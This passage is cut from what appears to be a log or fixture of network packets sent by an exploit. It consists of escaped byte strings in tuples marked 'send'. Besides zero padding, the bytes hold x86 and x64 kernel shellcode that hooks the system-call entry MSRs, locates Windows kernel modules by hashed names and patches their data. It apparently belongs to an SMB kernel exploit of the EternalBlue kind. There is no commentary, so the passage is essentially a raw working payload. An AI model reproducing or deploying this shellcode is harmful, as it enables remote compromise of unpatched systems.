9Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\